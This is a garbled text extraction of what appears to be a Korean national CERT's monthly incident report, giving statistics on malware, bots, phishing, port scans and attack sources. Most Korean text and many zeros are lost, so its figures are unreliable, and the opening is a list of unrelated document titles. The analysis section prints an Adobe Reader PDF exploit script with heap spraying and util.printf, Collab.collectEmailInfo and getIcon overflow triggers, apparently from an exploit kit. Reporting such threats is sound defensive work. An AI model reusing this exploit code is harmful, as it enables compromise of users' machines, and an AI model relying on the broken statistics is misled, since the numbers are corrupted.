ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

Similar documents
*****

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

*


<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

UDP Flooding Attack 공격과 방어

*2월완결

Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE , CVE , CVE , CVE

제20회_해킹방지워크샵_(이재석)

Contents 월간동향요약 2. 침해사고통계분석 3 -. 증감추이 ( 전월대비 ) 3-2. 침해사고통계요약 3-3. 침해사고통계현황 4 웜 바이러스신고건수추이 주요웜 바이러스별현황 -4. 해킹 6 해킹사고접수처리건수추이 피해기관별분류 피해운영체제별분류 피싱경유지신고처

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

SMB_ICMP_UDP(huichang).PDF

*2월완결

ìœ€íŁ´IP( _0219).xlsx

User Guide

*2월완결

Network seminar.key

ESET Endpoint Security

SKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시

Backup Exec

vm-웨어-01장

침입방지솔루션도입검토보고서

TCP.IP.ppt

Subnet Address Internet Network G Network Network class B networ

1217 WebTrafMon II

2006 정보통신문화신서 01 디지털사회, 위험을 커뮤니케이션하다 2006 정보통신문화신서 01 디지털사회, 위험을 커뮤니케이션하다 초판1쇄 인쇄 : 2006년 6월 26일 초판1쇄 발행 : 2006년 6월 29일 지은이 : 서보윤 펴낸이 : 이정훈 펴낸곳 : KT문화

StruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare Cen

ESET Cyber Security Pro

PowerPoint 프레젠테이션

Microsoft PowerPoint - L4-7Switch기본교육자료.ppt

Assign an IP Address and Access the Video Stream - Installation Guide

PCServerMgmt7

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션 4: 결론 14 섹션 5: 참조 자료 15 섹션 6: 저자 소개 16 2

월간 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2

Analyst Briefing

*2월완결

105È£4fš

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

bn2019_2

: Symantec Backup Exec System Recovery 8:

Microsoft PowerPoint - 4. 스캐닝-2.ppt [호환 모드]

untitled

자바-11장N'1-502

SOLUTION BRIEF 차세대 빅데이터 기반 통합로그관리시스템으자, SIEM 솔루션으로 데이터를 수집/분석/검색 및 추가하고, 효율적인 보안 운영을 실시합니다. 대용량 데이터를 수집하고 처리하는 능력은 사이버 보안에 있어서 통찰력을 제공하는 가장 중요하고, 기초적인

Microsoft PowerPoint - 4.스캐닝-1(11.08) [호환 모드]

Chap7.PDF

Microsoft PowerPoint - G3-2-박재우.pptx

TTA Verified : HomeGateway :, : (NEtwork Testing Team)

2-11Àå

!K_InDesginCS_NFH

00인터넷지07+08-웹용.indd

Sena Device Server Serial/IP TM Version


Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인 웹 확장 아키텍처는 높은 수준의 안정성을 보장하기 위해 복잡한 솔루션으로 구현

Microsoft Word - UG-BetaDraft_KO_TT-OK.doc

월간 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

ARMBOOT 1

VZ94-한글매뉴얼

본보고서내용의전부나일부를인용하는경우에는반드시출처 [ 자료 : 한국인터넷진흥원인터넷침해대응센터 ] 를명시하여주시기바랍니다.

rv 브로슈어 국문

KARAAUTO_4¿ù.qxd-ÀÌÆå.ps, page Normalize

초보자를 위한 ADO 21일 완성

자식농사웹완


표1.4출력

003-p.ps

중앙도서관소식지겨울내지33

표1~4


chungo_story_2013.pdf

*중1부

2

Çѱ¹ÀÇ ¼º°øº¥Ã³µµÅ¥

...._


전반부-pdf

<4D F736F F F696E74202D20312E20B0E6C1A6C0FCB8C15F3136B3E2C7CFB9DDB1E25F325FC6ED28C0BA292E >

_

12월월간보고서내지편집3

에너지포커스 2007년 가을호


01_당선자공약_서울

인권문예대회_작품집4-2




목차

A°ø¸ðÀü ³»Áö1-¼öÁ¤

±¹³»°æÁ¦ º¹»ç1

¿¡³ÊÁö ÀÚ¿ø-Âü°í ³»Áö.PDF

전반부-pdf

뉴스레터6호

Microsoft PowerPoint 하반기 크레딧 전망_V3.pptx

50차 본문 최종

양성내지b72뼈訪?303逞

³»Áöc03âš

fsb9¿ù³»ÁöÃÖÁ¾Ãâ

Transcription:

Korea Internet & Security Agency 21 3

CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35

1 213

Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6% 13 19 45.8%.7.6.1 21 1 2 3 4 5 6 7 8 9 1 11 12 1,395 932 1,32 1,85 3,319 21,23 898 1,76 1,53 3,27 1,148 154 317 222 693 988 78 16 116 3 2,743 232 23 345 87 3,31 223 233 267 723 4,32 211 19 13 54 Bot 1.%.6%.6%.7%.6% 1,6 29 21 1,4 1,32 1,2 1, 932 1,85 8 6 4 2 1 2 3 4 5 6 7 8 9 11112 1,7 1,2 7 317 2 154 222 29 21 1 2 3 4 5 6 7 8 9 11112 16 12 8 78 4 16 116 29 21 1 2 3 4 5 6 7 8 9 11112 Bot 8 6 612 455 463 4 2 29 21 1 2 3 4 5 6 7 8 9 11112 1,3 29 5% 21 1,1 4% 9 3% 7 5 2% 3 211 1% 19.6%.6% 1.7% 13 1 2 3 4 5 6 7 8 9 11112 29 21 1 2 3 4 5 6 7 8 9 1 11 12 2 213

1,395 932 21 1 2 3 4 5 6 7 8 9 1 11 12 1,32 1,85 3,319 18 16 29 21 14 12 1 932 1,32 1,85 8 6 4 2 1 2 3 4 5 6 7 8 9 1 11 12 3 213

21 1 2 3 4 5 6 1 ON LINE GAME HACK 122 AGENT 135 ONLINE GAME HACK 149 2 AGENT 17 BREDOLAB 126 AGENT 18 3 MALWARE 75 AUTORUN 114 PALEVO 65 4 XEMA 52 PALEVO 75 AUTO RUN 6 5 DOWNLOADER 44 MALWARE 61 FAKE AV 48 6 AUTO RUN 39 ONLINE GAME HACK 56 DOWNLOADER 43 7 FAKE AV 24 DOWNLOADER 44 XEMA 41 8 BAGLE 23 FAKESYS 43 LMIRHACK 28 9 BREDOLAB 22 XEMA 39 MALWARE 27 1 INDUC 16 BIFROSE 36 DANOL 26 48 573 49 932 1,32 1,85 4 213

21 1 2 3 4 5 6 7 8 9 1 11 12 1,148 154 317 222 693 988 78 16 116 3 2,743 232 23 345 87 3,31 223 233 267 723 4,32 211 19 13 54 21,23 898 1,76 1,53 3,27 21.1% 25.4% 11% 32.8% 9.8% 5 213

21 1 2 3 4 5 6 7 8 9 1 11 12 4,185 277 362 451 1,9 598 36 3 23 89 239 7 18 38 63 1 1 16,26 578 666 541 1,785 21,23 898 1,76 1,53 3,27 51.4% 2.2% 3.6% 42.8% 21 1 2 3 4 5 6 7 8 9 1 11 12 Windows 14,174 492 633 667 1,792 Linux 4,4 238 257 188 683 Unix 49 17 1 2 29 2,166 151 176 196 523 21,23 898 1,76 1,53 3,27 6 213

988 78 16 116 21 1 2 3 4 5 6 7 8 9 1 11 12 3 18 16 29 21 14 12 16 116 1 8 78 6 4 2 1 2 3 4 5 6 7 8 9 1 11 12 9.5% 96 7.7% 9 82.8% 11 116 7 213

5 4 2 4 9 8 57 3 2 3 3 1 1 1 1 1 1 4 3 4 21 1 2 1 1 19 1 1 2 29 116 66 1 23 12 14.9% 12.1% 1.3% 19.8% 56.9% 116 TCP/8 116 116 1% 8 213

21 1 2 3 4 5 6 7 8 9 1 11 12 4,32 211 19 13 54 1,11 44 48 49 141 7 6 5 4 3 2 1 211 44 19 48 13 49 1 2 3 4 5 6 7 8 9 1 11 12 9 213

21 1 2 3 4 5 6 7 8 9 1 11 12 1.%.6%.6%.7%.6% 3% 2.5% 2% 1.5% 1%.5%.6%.6%.7% % 1,, 9,, 8,, 7,, 6,, 5,, 4,, 3,, 2,, 1,, 1 213

.5% 1.7%.6%.5% 2.8% 19.2% 56.5% 445 139 8 125 135 5.1% 8.1% 86% 445 8 139 23 23 Cisco Telnet 2967 Symantec Exploit 8 WebDAV, ASN.1-HTTP, Cisco HTTP 2745 Bagle, Bagle2 135 DCOM, DCOM2 3127 MyDoom 139 NetBIOS, ASN.1-NT 314 Optix 143 IMail 5 UPNP 445 NetBIOS, LSASS, WksSvc, ASN.1-SMB, DCOM, RPC 611 Veritas Backup Exec 93 NetDevil 6129 Dameware 125 DCOM 173 Kuang2 1433 MS-SQL 27347 Sub7 1) Http://www.microsoft.com/technet/security/current.aspx 2) Http://www.boho.or.kr/pccheck/pcch_5.jsp?page_id=5 11 213

1 1 1 1 1 12 1 8 6 4 2 1 1 2 3 4 5 6 7 8 9 1 11 12 16 14 12 1 8 6 4 2 1 2 3 4 5 6 7 8 9 1 11 12 13 14 15 16 17 18 19 2 21 22 23 24 25 26 27 28 29 3 31 12 213

3,5 3, IP IP 2,5 2, 1,5 1, 5 1 2 3 4 5 6 7 8 9 1 11 12 KISC - Korea Internet Security Center, KISA 13 213

Canada China U.S.A 1% 18% 31% 7% 6% 35% 6% 7% 61% 4% 8% 86% 8% 22% China TCP/1433-tcp service scan TCP/2967-tcp service scan TCP/22-tcp service scan TCP/888-tcp service scan U.S.A TCP/445-netbios smb client to lsasrv request TCP/2967-tcp service scan ICMP-icmp ping Nmap scan TCP/22-tcp service scan Canada UDP/53-udp service scan TCP/445-netbios smb client to lsasrv request TCP/139-worm esbot.a 14 213

1 2 3 4 5 6 7 8 9 1 63.6% 8.9% 7.1% 5.5% 2.2% 1.4% 1.2% 1.%.9%.9% 7.4% 43.7% 16.4% 1.8% 6.1% 3.4% 2.3% 1.9% 1.9% 1.7% 1.4% 1.4% 59.4% 12.2% 8.4% 3.3% 2.3% 1.6% 1.6% 1.1%.9%.8% 8.4% 15 213

netbios smb client to 1 TCP/1433 tcp service scan 25.3% TCP/1433 tcp service scan 22.7% TCP/445 lsasrv request netbios lsass buffer 2 TCP/2967 tcp service scan 16.7% TCP/445 overflow 2 netbios smb client to 3 TCP/22 tcp service scan 1.4% TCP/445 lsasrv request 1.4% TCP/1433 9.4% TCP/2967 tcp service scan tcp service scan netbios smb client to 4 TCP/445 lsasrv request 8.4% TCP/22 tcp service scan 8.8% UDP/53 udp service scan icmp ping Advanced IP 5 TCP/18 tcp service scan 8.1% ICMP Scanner v1.4 4.7% TCP/22 tcp service scan 6 TCP/1521 tcp service scan 2.8% ICMP icmp ping X-scan scan 4.5% TCP/88 tcp service scan 7 8 9 1 TCP/336 tcp service scan 2.5% TCP/18 tcp service scan 4% TCP/888 TCP/8 tcp service scan 2.3% TCP/1 tcp service scan 3.3% TCP/89 TCP/139 worm esbot.a 2.2% TCP/336 tcp service scan 3.2% TCP/889 TCP/88 tcp service scan 2.1% TCP/88 tcp service scan 3% 19.2% 26.2% TCP/8 tcp service scan tcp service scan tcp service scan tcp service scan 18.8% 18% 13.3% 7.4% 7.1% 3.5% 3.2% 3.2% 2.9% 2.8% 19.7% 16 213

42.5% 7.4% 18.8% 13.3% 18% TCP/445 - netbios smb client to lsasrv reauest TCP/1433 - tcp service scan TCP/2967 - tcp service scan UDP/53 - udp service scan 17 213

1 TCP/135 tcp service scan netbios dcerpc 19.1% TCP/135 47.9% TCP/4899 tcp service scan invalid bind 2 TCP/135 netbios dcerpc invalid bind 12.% TCP/135 rpc dcom interface 37.4% TCP/135 netbios dcerpc invalid bind overflow exploit TCP/4899 tcp service scan backdoor famous 3 1.3% UDP/53 worm slammer botnet ddns dns query 8% UDP/1434 4 TCP/1433 tcp service scan 9.% TCP/135 tcp service scan 2.9% TCP/189 tcp service scan rpc dcom interface 5 TCP/135 overflow exploit 7.7% TCP/4899 tcp service scan.9% TCP/1433 tcp service scan 6 TCP/22 tcp service scan 7.% TCP/3389 rpc dcom interface tcp service scan.5% TCP/135 overflow exploit 7 UDP/1434 worm slammer 6.9% TCP/1433 tcp service scan.4% TCP/135 tcp service scan backdoor famous backdoor famous 8 UDP/53 botnet ddns dns query 4.8% UDP/1434 worm slammer.4% UDP/53 botnet ddns dns query 9 TCP/2967 tcp service scan 2.8% TCP/1521 tcp service scan.3% TCP/22 tcp service scan microsoft windows 1 TCP/59 tcp service scan 2.7% TCP/139 pnp overflow exploit -.2% TCP/3389 tcp service scan suspicious zotob 17.7% 1.2% 21.3% 17.5% 15.3% 1.5% 9.5% 5.4% 4.7% 4% 2.5% 1.6% 7.9% 18 213

35.4% 1.5% 15.3% 21.3% 17.5% TCP/4899 - tcp service scan TCP/135 - netbios dcerpc invalid bind UDP/1434 - worm slammer TCP/189 - tcp service scan 19 213

13,, 12,, 11,, 1,, 9,, 8,, 7,, 6,, 5,, 4,, 3,, 2,, 1,, 3 / 1 2 3 4 5 6 7 8 9 1 11 12 13 14 15 16 17 18 19 2 21 22 23 24 25 26 27 28 29 3 31 TCP/8 UDP/9155 TCP/88 TCP/25 UDP/53 TCP/51 TCP/24 TCP/9153 UDP/443 TCP/54 55, 5, 45, 4, 35, 3, 25, 2, 15, 1, 5, 3/1 2 3 4 5 6 7 8 9 1 11 12 13 14 15 16 17 18 2 19 21 22 23 24 25 26 27 28 29 3 31 TCP SYN Flooding(DDoS) Host Sweep UDP Tear Drop TCP ACK Flooding UDP Flooding TCP Connect DOS Ping Sweep HTTP Login B SMB Service sweep (tcp-445) Malicious Data(Etc Packet) 2 213

1 PWS 14.5% PWS 16.3% PWS 16.7% 2 HLLW 13.2% HLLW 12.7% HLLW 16% 3 GENERIC 9.8% GENERIC 8.8% GENERIC 1.9% 4 VIRUT 7.4% BREDLAB 8.4% HLLM 7.1% 5 HLLM 6.9% HLLM 6.5% VIRUT 6.2% 6 DOWNLOADER 5.8% PARITE 6.2% PARITE 4.2% 7 PARITE 5.8% VIRUT 5.6% NSANTI 2.9% 8 NSANTI 2.5% DOWNLOADER 4% ACADAP 2.8% 9 PESTUB 1.9% POLIPOS 3.2% DOWNLOADER 2.6% 1 MULDROP 1.8% ACADAP 2.2% PESTUB 2.3% 3.4% 26.1% 28.3% 1% 1% 1% 21 213

22 213

23 213

24 213

var arry = new Array(); function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(, len / 2); return yarsp; } var version = app.viewerversion; if (version > 8){ var payload = unescape(" "); nop = unescape("%uaa%uaa%uaa%uaa"); heapblock = nop + payload; bigblock = unescape("%uaa%uaa"); headersize = 2; spray = headersize + heapblock.length; while (bigblock.length < spray)bigblock += bigblock; fillblock = bigblock.substring(, spray); block = bigblock.substring(, bigblock.length - spray); while (block.length + spray < x4) block = block + block + fillblock; mem = new Array(); for (i = ; i < 14; i ++ )mem[i] = block + heapblock; var num = ; util.printf("%45f", num); } if (version < 8){ var addkk = unescape(" "); this.collabstore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } if (version < 9.1){ if (app.doc.collab.geticon){ var vvpethya = unescape(" "); app.doc.collab.geticon(tumhnbgw); } } 25 213

26 213

27 213

28 213

29 213

3 213

1,731 36 5,621 7,352 1 2 3 4 5 6 7 8 9 1 11 12 52 88 62 13 169 22 192 371 21 267 384 651 31 213

14 29 21 12 1 8 6 4 2 1,64 1,95 797 86 684 582 526 385 47 416 371 192 273 317 88 1 2 3 4 5 6 7 8 9 1 11 12 4,561 4 68 542 6 12 329 1,84 1 2 3 4 5 6 7 8 9 1 11 12 5 37 111 1 7 8 65 156 1 27 15 172 21 7,352 88 192 371 651 37 2 4 28 274 46.4% 42.% 7.3% 4.%.3% 32 213

21 1 2 3 4 5 6 7 8 9 1 11 12 2,519 28 39 97 164 1,8 17 7 73 16 3,33 43 83 21 327 7,352 88 192 371 651 33 213

22 8 135 139 445 125 18 1433 1434 2745 341 4899 5 6129 88 34 213

35 213

Trojan Phishing ASP.NET Botnet DHTML Editing Component ActiveX E-mail Hyperlink KrCERT/CC LLS NetBIOS OLE/COM PNG SMB TCP Syn Flooding Windows SharePoint Services Windows Shell 39 212